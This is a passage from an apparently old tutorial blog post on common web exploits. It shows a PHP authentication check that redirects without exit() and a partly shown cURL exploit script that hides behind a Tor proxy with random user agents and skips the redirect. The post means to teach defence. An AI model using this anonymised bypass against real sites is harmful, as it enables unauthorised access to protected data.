The All Too Usual Exploits.

Publicated on : 1192604434
This isn't new stuff, still I like to stress programmers to understand how certain design decisions could hurt them in a way that was not foreseen. The below exploits are very common, personally a rough estimate is that 70% to 80% of all software has at least one of the exploits below. A good statistic are bug lists where these exploits are all too common. This isn't hard to secure yourself from, so just learn and do it. Because the below examples can deface, exploit or terminate your website. And what is most important: if you are securing this, your server cannot be used by attackers that install shells to attack other servers anymore. Personally, it is exhausting to see popular software contain such holes, but moreover a few months later, a second flaw is found which was the same. You know, WordPress, PHPBB and others.


Authentication bypassing.

Usually programmers forget to exit a script after certain decision making. One example could be that they perform a redirect. This could be in some authentication script, or something else that needs to be checked, like cookies. The problem with this re-direct assumption is that we can write a script that does not follow your redirect, thus it will execute all code below.

<?php

if($_COOKIE['user'] !== "apfnurajd") {
header("location:index.php");
# exit(); <= this should always be set.
}

# This should not be readable!
# content...
echo "Hello your config settings are:";
echo "user: foo";
echo "pass: bar";

?>

Exploitation code.

Here we use a fairly trivial cURL script that connects to the server and does not permit to be re-directed. We can set this with the cURL option FOLLOWLOCATION to false. This way, every single line below the above script will be executed. Just because we did not exit the script with: exit();

<?php

function torify($url){

$ua = array('Mozilla','Opera','Microsoft Internet Explorer','ia_archiver');
$op = array('Windows','Windows XP','Linux','Windows NT');
$agent = $ua[rand(0,3)].'/'.rand(1,8).'.'.rand(0,9).'('.$op[rand(0,5)].' '.rand(1,7).'.'.rand(0,9).'; en-US;)';

$timeout = '300';
$tor = '127.0.0.1:8118';
# $rcodes = parse_ini_file('C:PHPcURL.ini');

$packet = curl_init();
curl_setopt ($packet, CURLOPT_PROXY, $tor);
curl_setopt ($packet, CURLOPT_URL, $url);
curl_setopt ($packet, CURLOPT_USERAGENT, $agent);
curl_setopt ($packet, CURLOPT_HEADER, 1);
curl_setopt ($packet, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($packet, CURLOPT_FOLLOWLOCATION, 0); # don't follow redirects!
curl_setopt ($packet, CURLOPT_TIMEOUT,